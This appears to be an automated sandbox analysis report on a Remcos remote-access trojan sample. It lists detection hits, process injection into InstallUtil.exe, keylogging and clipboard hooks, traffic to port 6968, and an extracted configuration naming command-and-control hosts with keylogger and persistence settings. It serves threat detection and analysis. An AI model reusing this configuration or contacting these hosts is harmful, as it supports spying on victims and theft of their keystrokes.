Source: Yara match | File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR
Source: kyFBQxVbsg.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | ReversingLabs: Detection: 57%
Source: kyFBQxVbsg.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Joe Sandbox ML: detected
Source: 26.2.InstallUtil.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.1.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.7.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.8.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 0.2.kyFBQxVbsg.exe.2e0000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.5.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.2.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.3.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.4.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 19.2.Qerdo.exe.40000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.3.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.7.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.7.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.1.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.2.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.6.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 19.0.Qerdo.exe.40000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.2.InstallUtil.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.4.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.5.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.6.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 24.2.Qerdo.exe.9a0000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.1.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.8.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 24.0.Qerdo.exe.9a0000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen
Source: 26.0.InstallUtil.exe.400000.5.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.2.InstallUtil.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 0.0.kyFBQxVbsg.exe.2e0000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen
Source: 17.0.InstallUtil.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.6.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.4.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.2.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.8.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.3.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 26.2.InstallUtil.exe.400000.0.unpack | Malware Configuration Extractor: Remcos {"Version": "3.5.1 Pro", "Host:Port:Password": "nikahuve.ac.ug:6968:0kalskala.ac.ug:6968:0tuekisaa.ac.ug:6968:0parthaha.ac.ug:6968:0", "Assigned name": "06192022", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "cvxyttydfsgbghfgfhtd-RXTSAM", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "scxs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "forbas", "Keylog file max size": "0"}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00430185 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_00430185
Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: kyFBQxVbsg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: kyFBQxVbsg.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW,17_2_00406571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040620E FindFirstFileW,FindNextFileW,17_2_0040620E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW,17_2_004162EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040A3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0044A569 FindFirstFileExA,17_2_0044A569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_004187B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00407ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00406EEF

Networking

Source: Malware configuration extractor | URLs: nikahuve.ac.ug
Source: Joe Sandbox View | ASN Name: DANILENKODE
Source: Joe Sandbox View | IP Address: 194.5.98.107
Source: global traffic | TCP traffic: 192.168.2.6:49798 -> 194.5.98.107:6968
Source: InstallUtil.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
          Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
          Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
          Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
          Source: unknownDNS traffic detected: queries for: nikahuve.ac.ug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0042386F recv,17_2_0042386F

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00408B9A GetForegroundWindow, GetWindowThreadProcessId, GetKeyboardLayout, GetKeyState, GetKeyboardState, ToUnicodeEx, 17_2_00408B9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00409D9C OpenClipboard, GetClipboardData, CloseClipboard, 17_2_00409D9C
Source: Qerdo.exe, 00000013.00000002.597284812.0000000000878000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match | File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

System Summary

Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
